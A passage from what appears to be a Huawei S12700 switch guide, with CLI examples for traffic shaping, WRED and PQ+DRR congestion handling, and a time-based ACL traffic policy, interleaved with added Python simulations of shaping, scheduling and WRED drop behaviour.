therefore, jitter may occur on GE2/0/1. The requirements are as follows to prevent jitter and
ensure bandwidth of services:

l The CIR of the interface is 10000 kbit/s.
l The CIR and PIR for the voice service are 3000 kbit/s and 5000 kbit/s respectively.
l The CIR and PIR for the video service are 5000 kbit/s and 8000 kbit/s respectively.
l The CIR and PIR for the data service are 2000 kbit/s and 3000 kbit/s respectively.

Figure 17-6 Networking of traffic shaping

[Figure: Phone (802.1p=6), PC (802.1p=2), and TV (802.1p=5) in the enterprise campus network connect to SwitchA, which connects to GE1/0/1 of the Switch; GE2/0/1 of the Switch connects to the Router and the network. Traffic direction: from the enterprise campus network towards the Router.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and configure interfaces so that users can access the Internet through the
Switch.
2. Configure priority mapping to map 802.1p priorities of different service packets to
PHBs.
3. Configure traffic shaping on an interface to limit the total bandwidth of the interface.
4. Configure traffic shaping on queues of the interface to limit the bandwidth of voice,
video, and data services.

Procedure
Step 1 Create a VLAN and configure interfaces.

# Create VLAN 10.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10

# Configure GE1/0/1 and GE2/0/1 as trunk interfaces and add them to VLAN 10.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 10
[Switch-GigabitEthernet2/0/1] quit

# Create VLANIF 10 and set its IP address to 10.10.10.2/24.


[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.10.10.2 255.255.255.0
[Switch-Vlanif10] quit

NOTE

On the router, set the IP address of the interface connected to the Switch to 10.10.10.1/24, and configure
a sub-interface on the interface to terminate the VLAN.

Step 2 Configure priority mapping.

# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, and 2 to PHBs CS7, EF, and
AF2 respectively.
[Switch] diffserv domain ds1
[Switch-dsdomain-ds1] 8021p-inbound 6 phb cs7 //Map 802.1p priorities in
different service flows to PHBs so that the service flows enter different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb ef
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af2
[Switch-dsdomain-ds1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] trust upstream ds1
[Switch-GigabitEthernet1/0/1] quit

Step 3 Configure traffic shaping on an interface.

# Configure traffic shaping on an interface of the Switch to limit the CIR of the interface to
10000 kbit/s.

[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] qos lr cir 10000 outbound //Configure interface-based rate limiting in the outbound direction to limit the total bandwidth.

Step 4 Configure traffic shaping on queues of the interface.


# Configure traffic shaping on queues of the interface on the Switch to set the CIR values of
voice, video, and data services to 3000 kbit/s, 5000 kbit/s, and 2000 kbit/s respectively and
their PIR values to 5000 kbit/s, 8000 kbit/s, and 3000 kbit/s respectively.
[Switch-GigabitEthernet2/0/1] qos queue 7 shaping cir 3000 pir 5000 //Set the
bandwidth of voice packets entering queue 7 to 3000 kbit/s according to the
default mapping between PHBs and local priorities.
[Switch-GigabitEthernet2/0/1] qos queue 5 shaping cir 5000 pir 8000
[Switch-GigabitEthernet2/0/1] qos queue 2 shaping cir 2000 pir 3000
[Switch-GigabitEthernet2/0/1] quit
[Switch] quit

Step 5 Verify the configuration.


# Check the configuration of the DiffServ domain ds1.
<Switch> display diffserv domain name ds1
diffserv domain name:ds1
8021p-inbound 0 phb be green
8021p-inbound 1 phb af1 green
8021p-inbound 2 phb af2 green
8021p-inbound 3 phb af3 green
8021p-inbound 4 phb af4 green
8021p-inbound 5 phb ef green
8021p-inbound 6 phb cs7 green
8021p-inbound 7 phb cs7 green
8021p-outbound be green map 0
......

# After the configuration is complete, the CIR of packets sent from GE2/0/1 is 10000 kbit/s;
the CIR of the voice service packets is 3000 kbit/s and PIR is 5000 kbit/s; the CIR of the
video service packets is 5000 kbit/s and the PIR is 8000 kbit/s; the CIR of the data service
packets is 2000 kbit/s and the PIR is 3000 kbit/s.
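The policing-versus-shaping contrast from the overview can be checked with the following added Python simulation, which is not part of this Huawei document. It models a single-rate token bucket with the CIR and CBS from the configuration file at the end of this example (cir 10000 kbit/s, cbs 1250000 bytes) and runs the same burst through it once as a policer, which discards packets that find no tokens, and once as a shaper, which queues them and releases them at the committed rate; the burst and the buffer size are constructed values.

```python
from collections import deque
from dataclasses import dataclass, field
from typing import List

# Values from the configuration file: "qos lr cir 10000 cbs 1250000 outbound".
# 10000 kbit/s = 1,250,000 bytes/s, so the CBS holds exactly one second of tokens.
CIR_KBPS = 10000
CBS_BYTES = 1250000


@dataclass
class TokenBucket:
    cir_kbps: int
    cbs_bytes: int
    tokens: float = field(init=False)
    last: float = 0.0                          # time of the last refill, seconds

    def __post_init__(self) -> None:
        self.rate = self.cir_kbps * 1000 / 8   # tokens (bytes) added per second
        self.tokens = float(self.cbs_bytes)     # the bucket starts full

    def refill(self, now: float) -> None:
        self.tokens = min(self.cbs_bytes, self.tokens + (now - self.last) * self.rate)
        self.last = now

    def wait_for(self, size: int, now: float) -> float:
        """Seconds until `size` tokens are available; 0.0 if they already are."""
        self.refill(now)
        return 0.0 if self.tokens >= size else (size - self.tokens) / self.rate

    def take(self, size: int, now: float) -> None:
        self.refill(now)
        self.tokens -= size


@dataclass
class Result:
    departures: List[float]   # departure time of each forwarded packet, seconds
    dropped: int


def police(arrivals: List[float], size: int) -> Result:
    """Traffic policing: a packet that finds too few tokens is discarded at once."""
    bucket = TokenBucket(CIR_KBPS, CBS_BYTES)
    out, dropped = [], 0
    for t in arrivals:
        if bucket.wait_for(size, t) == 0.0:
            bucket.take(size, t)
            out.append(t)
        else:
            dropped += 1
    return Result(out, dropped)


def shape(arrivals: List[float], size: int, buffer_bytes: int) -> Result:
    """Traffic shaping: excess packets wait in a FIFO buffer and leave as tokens
    arrive, so the output never exceeds the CIR once the CBS burst is spent.
    A packet arriving while the buffer is full is dropped, as on a real port."""
    bucket = TokenBucket(CIR_KBPS, CBS_BYTES)
    backlog = deque()                  # (departure, size) of packets still waiting
    queued_bytes = 0
    out, dropped = [], 0
    next_free = 0.0                    # FIFO: a packet cannot overtake its predecessor
    for t in arrivals:
        while backlog and backlog[0][0] <= t:      # packets that have already left
            queued_bytes -= backlog.popleft()[1]
        if queued_bytes + size > buffer_bytes:
            dropped += 1
            continue
        start = max(t, next_free)
        depart = start + bucket.wait_for(size, start)
        bucket.take(size, depart)
        next_free = depart
        out.append(depart)
        if depart > t:                 # the packet had to wait: it occupies buffer space
            backlog.append((depart, size))
            queued_bytes += size
    return Result(out, dropped)


# Constructed input: a burst of 1000 x 1500-byte packets all arriving at t = 0,
# i.e. 250,000 bytes more than the bucket can absorb in one go.
BURST = [0.0] * 1000
PACKET = 1500

if __name__ == "__main__":
    p = police(BURST, PACKET)
    s = shape(BURST, PACKET, buffer_bytes=CBS_BYTES)
    print(f"policer: forwarded {len(p.departures)}, dropped {p.dropped}")
    print(f"shaper : forwarded {len(s.departures)}, dropped {s.dropped}, "
          f"last packet leaves at {s.departures[-1]:.4f} s")
```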

----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
diffserv domain ds1
8021p-inbound 6 phb cs7 green
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
trust upstream ds1
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 10
qos lr cir 10000 cbs 1250000 outbound
qos queue 2 shaping cir 2000 pir 3000
qos queue 5 shaping cir 5000 pir 8000
qos queue 7 shaping cir 3000 pir 5000
#
return

17.7 Example for Configuring Congestion Avoidance and Congestion Management

Overview of Congestion Management and Congestion Avoidance


Congestion management implements queuing and scheduling when sending packet flows.
Based on the queuing and scheduling policies, the device provides the following congestion
management technologies: Priority Queuing (PQ), Deficit Round Robin (DRR), Weighted
Round Robin (WRR), PQ+DRR, and PQ+WRR. On the device, there are eight queues on
each interface in the outbound direction, which are identified by index numbers. The index
numbers range from 0 to 7. Based on the mappings between local priorities and queues, the
device sends the classified packets to queues, and then schedules the packets using queue
scheduling mechanisms.

Congestion avoidance is a flow control mechanism. A system configured with congestion
avoidance monitors network resource usage such as queues and memory buffers. When
congestion occurs or aggravates, the system discards packets. Congestion avoidance uses tail
drop and random drop policies to discard packets. Random drop policies include Simple
Random Early Detection (SRED) and Weighted Random Early Detection (WRED).

This example uses PQ+DRR scheduling to implement congestion management. In WRR
scheduling, the number of times packets are scheduled in each queue is in direct ratio to the
weight of this queue. A higher weight indicates more times packets are scheduled. WRR
schedules packets based on the number of packets. That is, large-sized packets are more likely
to be scheduled and obtain more bandwidth. DRR schedules packets considering the packet
length, ensuring that packets are scheduled with the same chance. WRED is configured to
implement congestion avoidance. The device discards excess traffic according to the
maximum drop probability.
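The WRR-versus-DRR point above, as an added Python model that is not part of this Huawei document: queue 5 under PQ and queues 3 and 1 with DRR weights 100 and 50 as in this example, fed with constructed packet sizes. WRR hands out packets per round, so the queue carrying 1500-byte packets outruns the higher-weighted queue carrying 64-byte packets; DRR hands out bytes, so the 2:1 weight ratio holds in bandwidth. The credit per weight unit and the packet mix are assumptions of the model, not device parameters.

```python
from collections import deque
from typing import Deque, Dict


def make_queue(size: int, count: int) -> Deque[int]:
    """Constructed queue: `count` packets of `size` bytes each."""
    return deque([size] * count)


def wrr_round(queues: Dict[int, Deque[int]], weights: Dict[int, int],
              sent: Dict[int, int]) -> None:
    """WRR: per round a queue sends a packet count proportional to its weight
    (here weight/50 packets), whatever the packet sizes are."""
    for q, w in weights.items():
        for _ in range(w // 50):
            if queues[q]:
                sent[q] += queues[q].popleft()


def drr_round(queues: Dict[int, Deque[int]], weights: Dict[int, int],
              deficits: Dict[int, int], sent: Dict[int, int],
              bytes_per_weight: int = 30) -> None:
    """DRR: per round a queue is credited weight*bytes_per_weight bytes and may
    only send packets that fit its accumulated deficit, so the share is in bytes.
    The credit per weight unit is a constructed value, not the device's."""
    for q, w in weights.items():
        if not queues[q]:
            deficits[q] = 0                    # an idle queue banks no credit
            continue
        deficits[q] += w * bytes_per_weight
        while queues[q] and queues[q][0] <= deficits[q]:
            size = queues[q].popleft()
            deficits[q] -= size
            sent[q] += size


def schedule(mode: str, rounds: int) -> Dict[int, int]:
    """Model of GE1/0/1 in this example: queue 5 (EF) under PQ, queue 3 (AF3,
    DRR weight 100) and queue 1 (AF1, DRR weight 50). To expose the packet-size
    effect, queue 3 is filled with 64-byte packets and queue 1 with 1500-byte
    packets (constructed). Returns bytes sent per queue."""
    queues = {
        5: make_queue(200, 10),       # a short burst of strict-priority traffic
        3: make_queue(64, 100000),    # high weight, small packets
        1: make_queue(1500, 100000),  # low weight, large packets
    }
    weights = {3: 100, 1: 50}
    deficits = {3: 0, 1: 0}
    sent = {5: 0, 3: 0, 1: 0}
    for _ in range(rounds):
        while queues[5]:                # PQ: queue 5 is drained before any DRR/WRR round
            sent[5] += queues[5].popleft()
        if mode == "wrr":
            wrr_round(queues, weights, sent)
        elif mode == "drr":
            drr_round(queues, weights, deficits, sent)
        else:
            raise ValueError(mode)
    return sent


if __name__ == "__main__":
    for mode in ("wrr", "drr"):
        sent = schedule(mode, rounds=100)
        print(f"{mode}: queue3/queue1 byte ratio = {sent[3] / sent[1]:.3f}  ({sent})")
```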

Configuration Notes

Table 17-8 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-7, the Switch is connected to the router through GE2/0/1. The 802.1p
priorities of voice, video, and data services from the Internet are 6, 5, and 2, and these
services can reach residential users through the router and Switch. On the Switch, the rate of
GE2/0/1 (inbound interface) is higher than the rates of GE1/0/1 and GE1/0/2 (outbound
interfaces), so congestion may occur on the two outbound interfaces.
To reduce the impact of network congestion and ensure bandwidth for high-priority and
delay-sensitive services, set parameters according to Table 17-9 and Table 17-10.

Table 17-9 Congestion avoidance parameters

Service Type   Color    Lower Drop Threshold (%)   Upper Drop Threshold (%)   Maximum Drop Probability (%)
Voice          Green    80                         100                        10
Video          Yellow   60                         80                         20
Data           Red      40                         60                         40

Table 17-10 Congestion management parameters

Service Type   CoS Value   DRR Weight
Voice          EF          0
Video          AF3         100
Data           AF1         50

Figure 17-7 Networking of congestion avoidance and congestion management

[Figure: The Internet connects to the Router, which connects to GE2/0/1 of the Switch. GE1/0/1 and GE1/0/2 of the Switch each connect to an LSW serving a PC (802.1p=2), a TV (802.1p=5), and a Phone (802.1p=6).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure a VLAN for each interface so that devices can communicate with each other
at the link layer.
2. Create a DiffServ domain on the Switch to map 802.1p priorities of different service
packets to PHBs and colors, and bind the DiffServ domain to the inbound interface of the
Switch.
3. Configure a WRED profile on the Switch and apply the WRED profile to the outbound
interfaces.
4. Set scheduling parameters of each queue on the outbound interface of the Switch.

Procedure
Step 1 Configure a VLAN for each interface so that devices can communicate with each other at the
link layer.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 2 5 6
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 5 6
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type trunk
[Switch-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 5 6
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] port link-type trunk
[Switch-GigabitEthernet2/0/1] port trunk allow-pass vlan 2 5 6
[Switch-GigabitEthernet2/0/1] quit

Step 2 Configure priority mapping.

# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, 2 to PHBs of EF, AF3, and AF1
and colors of green, yellow, and red respectively.
[Switch] diffserv domain ds1
[Switch-dsdomain-ds1] 8021p-inbound 6 phb ef green //Create a DiffServ domain to
map 802.1p priorities of different service packets to PHBs so that packets enter
different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb af3 yellow
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af1 red
[Switch-dsdomain-ds1] quit

# Bind the DiffServ domain to GE2/0/1 of the Switch.


[Switch] interface gigabitethernet 2/0/1
[Switch-GigabitEthernet2/0/1] trust upstream ds1 //Apply the DiffServ domain to
the interface.
[Switch-GigabitEthernet2/0/1] trust 8021p inner //Configure the interface to
trust 802.1p priorities.
[Switch-GigabitEthernet2/0/1] quit

Step 3 Configure congestion avoidance.

# Create a WRED profile wred1 on the Switch and set scheduling parameters in the WRED
profile.

[Switch] drop-profile wred1
[Switch-drop-wred1] color green low-limit 80 high-limit 100 discard-percentage
10 //Configure a WRED drop profile, and set the lower and upper drop thresholds
and the maximum drop probability for green packets.
[Switch-drop-wred1] color yellow low-limit 60 high-limit 80 discard-percentage
20 //When the percentage of the yellow packet length to the queue length reaches
60%, the device starts to discard packets with the maximum drop probability of
20%. When the percentage of the yellow packet length to the queue length reaches
80%, the device discards all new packets.
[Switch-drop-wred1] color red low-limit 40 high-limit 60 discard-percentage 40
[Switch-drop-wred1] quit

# Apply the WRED profile wred1 to GE1/0/1 and GE1/0/2 on the Switch.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] qos wred wred1
[Switch-GigabitEthernet1/0/1] qos queue 5 wred wred1
[Switch-GigabitEthernet1/0/1] qos queue 3 wred wred1
[Switch-GigabitEthernet1/0/1] qos queue 1 wred wred1
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] qos wred wred1
[Switch-GigabitEthernet1/0/2] qos queue 5 wred wred1
[Switch-GigabitEthernet1/0/2] qos queue 3 wred wred1
[Switch-GigabitEthernet1/0/2] qos queue 1 wred wred1
[Switch-GigabitEthernet1/0/2] quit

Step 4 Configure congestion management.


# Set scheduling parameters of each queue on GE1/0/1 and GE1/0/2 of the Switch.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] qos pq 5 //Configure PQ scheduling for queue 5.
[Switch-GigabitEthernet1/0/1] qos drr 0 to 4 //Configure DRR scheduling for
queues 0 to 4.
[Switch-GigabitEthernet1/0/1] qos queue 3 drr weight 100 //Set the DRR weight of
queue 3 to 100.
[Switch-GigabitEthernet1/0/1] qos queue 1 drr weight 50 //Set the DRR weight of
queue 1 to 50. The device schedules packets in queue 1 and queue 3 according to
the ratio of 1:2.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] qos pq 5
[Switch-GigabitEthernet1/0/2] qos drr 0 to 4
[Switch-GigabitEthernet1/0/2] qos queue 3 drr weight 100
[Switch-GigabitEthernet1/0/2] qos queue 1 drr weight 50
[Switch-GigabitEthernet1/0/2] quit

Step 5 Verify the configuration.


# Check the configuration of the DiffServ domain ds1.
[Switch] display diffserv domain name ds1
diffserv domain name:ds1
8021p-inbound 0 phb be green
8021p-inbound 1 phb af1 green
8021p-inbound 2 phb af1 red
8021p-inbound 3 phb af3 green
8021p-inbound 4 phb af4 green
8021p-inbound 5 phb af3 yellow
8021p-inbound 6 phb ef green
8021p-inbound 7 phb cs7 green
8021p-outbound be green map 0
......

# Check the WRED profile configuration.


[Switch] display drop-profile name wred1
Drop-profile[1]: wred1
Queue depth : default
Color       Low-limit   High-limit   Discard-percentage
-----------------------------------------------------------------
Green       80          100          10
Yellow      60          80           20
Red         40          60           40
Non-tcp     100         100          100
-----------------------------------------------------------------
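The drop-profile output above, turned into an added Python model (not from this Huawei document) of the WRED decision: the drop probability per color from the low-limit, high-limit and discard-percentage values of wred1, plus a constructed overload run that shows red (data) packets being dropped long before yellow (video) and green (voice) packets. The linear ramp between the two limits and the per-enqueue decision are assumptions of the model.

```python
import random
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class ColorThresholds:
    low_limit: int           # queue fill (%) at which random drop starts
    high_limit: int          # queue fill (%) from which every new packet is dropped
    discard_percentage: int  # drop probability (%) reached just below high_limit


# Profile wred1 as listed by "display drop-profile name wred1" above. The Non-tcp
# row is the device default for non-TCP traffic: no early drop, tail drop only.
WRED1: Dict[str, ColorThresholds] = {
    "green":   ColorThresholds(80, 100, 10),
    "yellow":  ColorThresholds(60, 80, 20),
    "red":     ColorThresholds(40, 60, 40),
    "non-tcp": ColorThresholds(100, 100, 100),
}


def drop_probability(profile: Dict[str, ColorThresholds], color: str,
                     fill_pct: float) -> float:
    """Drop probability (%) for a `color` packet when the queue is `fill_pct` full:
    0 below low-limit, rising linearly towards discard-percentage between the
    limits (assumed ramp), and 100 at or above high-limit (tail drop)."""
    t = profile[color]
    if fill_pct < t.low_limit:
        return 0.0
    if fill_pct >= t.high_limit:
        return 100.0
    return t.discard_percentage * (fill_pct - t.low_limit) / (t.high_limit - t.low_limit)


def simulate(profile: Dict[str, ColorThresholds], ticks: int = 1000,
             capacity: int = 1000, drain: int = 6, per_color: int = 3,
             seed: int = 7) -> Dict[str, int]:
    """Constructed congestion scenario: each tick the queue drains `drain`
    packets, then `per_color` packets of each color arrive (9 in, 6 out, so the
    queue fills). Returns the number of dropped packets per color. Assumption:
    the drop decision uses the queue fill seen when the packet is enqueued."""
    rng = random.Random(seed)
    queued = 0
    drops = {"green": 0, "yellow": 0, "red": 0}
    for _ in range(ticks):
        queued = max(0, queued - drain)
        for color in ("green", "yellow", "red"):
            for _ in range(per_color):
                fill_pct = 100.0 * queued / capacity
                if rng.random() * 100.0 < drop_probability(profile, color, fill_pct):
                    drops[color] += 1          # WRED early drop
                elif queued < capacity:
                    queued += 1
                else:
                    drops[color] += 1          # buffer physically full
    return drops


if __name__ == "__main__":
    for fill in (50, 70, 90):
        print(f"fill {fill}%:", {c: drop_probability(WRED1, c, fill)
                                  for c in ("green", "yellow", "red")})
    print("drops per color under sustained overload:", simulate(WRED1))
```

With the 9-in/6-out overload the queue settles just above the red high-limit, so the data traffic absorbs nearly all of the loss while the voice queue never reaches its 80% threshold.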

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
vlan batch 2 5 to 6
#
diffserv domain ds1
8021p-inbound 2 phb af1 red
8021p-inbound 5 phb af3 yellow
8021p-inbound 6 phb ef green
#
drop-profile wred1
color green low-limit 80 high-limit 100 discard-percentage 10
color yellow low-limit 60 high-limit 80 discard-percentage 20
color red low-limit 40 high-limit 60 discard-percentage 40
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 5 to 6
qos wred wred1
qos pq 5 to 7 drr 0 to 4
qos queue 1 drr weight 50
qos queue 3 drr weight 100
qos queue 1 wred wred1
qos queue 3 wred wred1
qos queue 5 wred wred1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 5 to 6
qos wred wred1
qos pq 5 to 7 drr 0 to 4
qos queue 1 drr weight 50
qos queue 3 drr weight 100
qos queue 1 wred wred1
qos queue 3 wred wred1
qos queue 5 wred wred1
#
interface GigabitEthernet2/0/1
port link-type trunk
port trunk allow-pass vlan 2 5 to 6
trust upstream ds1
trust 8021p inner
#
return

17.8 Example for Configuring a Traffic Policy to Prevent Some Users from Accessing the Internet at the Specified Time

Overview
Modular QoS Command-Line Interface (MQC) allows the device to classify traffic of a
certain type so that the device can provide the same service for packets of the same type and
differentiated services for packets of different types. Filtering packets of a specified type can
be implemented only through MQC.
When packets of a type are considered untrusted, MQC can be used to differentiate the
packets from other types of packets and discard them. When packets of a type are considered
trusted, MQC can be used to differentiate the packets from other types of packets and permit
them to pass through.
Compared with the blacklist, MQC-based packet filtering classifies packets in a more fine-grained manner and is more flexible to deploy.

Configuration Notes
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Table 17-11 Applicable product models and versions

Product Model   Software Version
S12700          V200R005C00 and later versions

Networking Requirements
As shown in Figure 17-8, the company has two departments that belong to VLAN 10 and
VLAN 20, respectively. Servers are deployed in VLAN 10 to provide services for internal and
external users, and office services of employees are transmitted in VLAN 20. The company
requires that employees in VLAN 20 access only servers in VLAN 10 during the working
time (8:00 to 18:00).

Figure 17-8 Preventing employees from accessing the Internet at the specified time

[Figure: VLAN 10 (192.168.1.0/24) and VLAN 20 (192.168.2.0/24) connect to GE1/0/1 and GE1/0/2 of SwitchA; the uplink of SwitchA connects to GE1/0/1 of the Switch. GE1/0/2 of the Switch connects to RouterA (10.1.20.1/24) and GE1/0/3 connects to RouterB (10.1.30.1/24); both routers lead to the network.]

Device    Interface              VLAN                  Layer 3 Interface          IP Address
SwitchA   GigabitEthernet1/0/1   VLAN 10               -                          192.168.1.1/24
          GigabitEthernet1/0/2   VLAN 20               -                          192.168.2.1/24
          GigabitEthernet1/0/3   VLAN 10 and VLAN 20   -                          192.168.3.1/24
Switch    GigabitEthernet1/0/1   VLAN 10 and VLAN 20   VLANIF 10 and VLANIF 20    VLANIF 10: 192.168.1.1/24; VLANIF 20: 192.168.2.1/24
          GigabitEthernet1/0/2   VLAN 30               VLANIF 30                  10.1.20.2/24
          GigabitEthernet1/0/3   VLAN 40               VLANIF 40                  10.1.30.2/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, and configure interfaces and a routing protocol to implement
interworking between the company and external network.
2. On the Switch, configure a time range 8:00-18:00 from Monday to Friday so that the
device can control traffic based on the time range.
3. On the Switch, configure an ACL to match the traffic when employees in VLAN 20
access servers in VLAN 10 based on the time range.
4. Configure a traffic classifier on the Switch to classify packets based on the ACL.
5. Configure a traffic behavior on the Switch to permit matched traffic to pass through.
6. Configure a traffic policy on the Switch, bind the traffic policy to the traffic classifier
and traffic behavior, and apply the traffic policy to the inbound direction of GE1/0/1
connected to SwitchA so that employees in VLAN 20 cannot access the Internet during
the working time and can access the Internet during the non-working time.

Procedure
Step 1 Create VLANs and configure interfaces.
# Configure the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 40 //Create VLAN 10 to VLAN 40.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the
interface to trunk.

[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add the interface to VLAN 10 and VLAN 20.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access //Set the link type of the
interface to access.
[Switch-GigabitEthernet1/0/2] port default vlan 30 //Add the interface to VLAN
30.
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access
[Switch-GigabitEthernet1/0/3] port default vlan 40
[Switch-GigabitEthernet1/0/3] quit
[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 192.168.1.1 255.255.255.0 //Configure an IP address
for the VLANIF interface. The IP address is the gateway address of network
segment 192.168.1.0/24.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.1 255.255.255.0
[Switch-Vlanif20] quit
[Switch] interface vlanif 30 //Create a VLANIF interface.
[Switch-Vlanif30] ip address 10.1.20.2 255.255.255.0 //Configure an IP address
for the VLANIF interface to connect to RouterA.
[Switch-Vlanif30] quit
[Switch] interface vlanif 40
[Switch-Vlanif40] ip address 10.1.30.2 255.255.255.0
[Switch-Vlanif40] quit
[Switch] ip route-static 0.0.0.0 0 10.1.20.1 //Configure a static route pointing
to the external network to implement interworking, and configure load balancing.
[Switch] ip route-static 0.0.0.0 0 10.1.30.1

# Configure SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 //Create VLAN 10 and VLAN 20.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Set the link type of the
interface to access.
[SwitchA-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN
10.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk //Set the link type of the
interface to trunk.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20 //Add the
interface to VLAN 10 and VLAN 20.
[SwitchA-GigabitEthernet1/0/3] quit

# Configure the router.


Configure the IP address of 10.1.20.1/24 for the interface of RouterA connected to the switch.
Configure the IP address of 10.1.30.1/24 for the interface of RouterB connected to the switch.
Step 2 Configure a time range.
# Configure a time range 8:00-18:00 from Monday to Friday on the Switch.
[Switch] time-range worktime 8:00 to 18:00 working-day

Step 3 Configure an ACL.


# Configure an ACL on the Switch and define rules that permit and deny traffic.
[Switch] acl 3000
[Switch-acl-adv-3000] rule permit ip source 192.168.2.0 0.0.0.255 destination
192.168.1.0 0.0.0.255 time-range worktime //Configure an ACL rule to permit
users in VLAN 20 to access servers in VLAN 10 during the working time.
[Switch-acl-adv-3000] rule deny ip source 192.168.2.0 0.0.0.255 time-range
worktime //Configure an ACL rule to prevent users in VLAN 20 from accessing the
public network during the working time.
[Switch-acl-adv-3000] quit

Step 4 Configure a traffic classifier.


# Configure a traffic classifier on the Switch to classify packets based on the ACL.
[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match acl 3000
[Switch-classifier-c1] quit

Step 5 Configure a traffic behavior.


# Configure a traffic behavior on the Switch and define the permit action.
[Switch] traffic behavior b1
[Switch-behavior-b1] permit
[Switch-behavior-b1] quit

Step 6 Configure a traffic policy and apply the traffic policy to an interface.
# Create a traffic policy on the Switch, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 connected to
SwitchA.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 7 Verify the configuration.


# Check the ACL configuration.
[Switch] display acl 3000
Advanced ACL 3000, 2 rules
Acl's step is 5
rule 5 permit ip source 192.168.2.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
time-range worktime (match-counter 0)(Active)
rule 10 deny ip source 192.168.2.0 0.0.0.255 time-range worktime (match-counter
0)(Active)

NOTE

If the time of the device is within the defined time range, the time range in the ACL rule is displayed as
Active; otherwise, the time range in the ACL rule is displayed as Inactive.

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit

# Employees in VLAN 20 cannot access the public network during the working time, and can
access servers in VLAN 10.
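The ACL and time-range logic of this example, as an added Python model that is not part of this Huawei document: wildcard-mask matching, the working-day time range, and first-match evaluation of ACL 3000. It reproduces the behaviour verified in Step 7: a packet hitting the deny rule is dropped, one hitting the permit rule is handled by behavior b1, and a packet matching no active rule is not subject to p1 and is forwarded normally. The exclusive end time, the test timestamps and the external address 203.0.113.10 are assumptions.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime, time
from typing import FrozenSet, List, Optional


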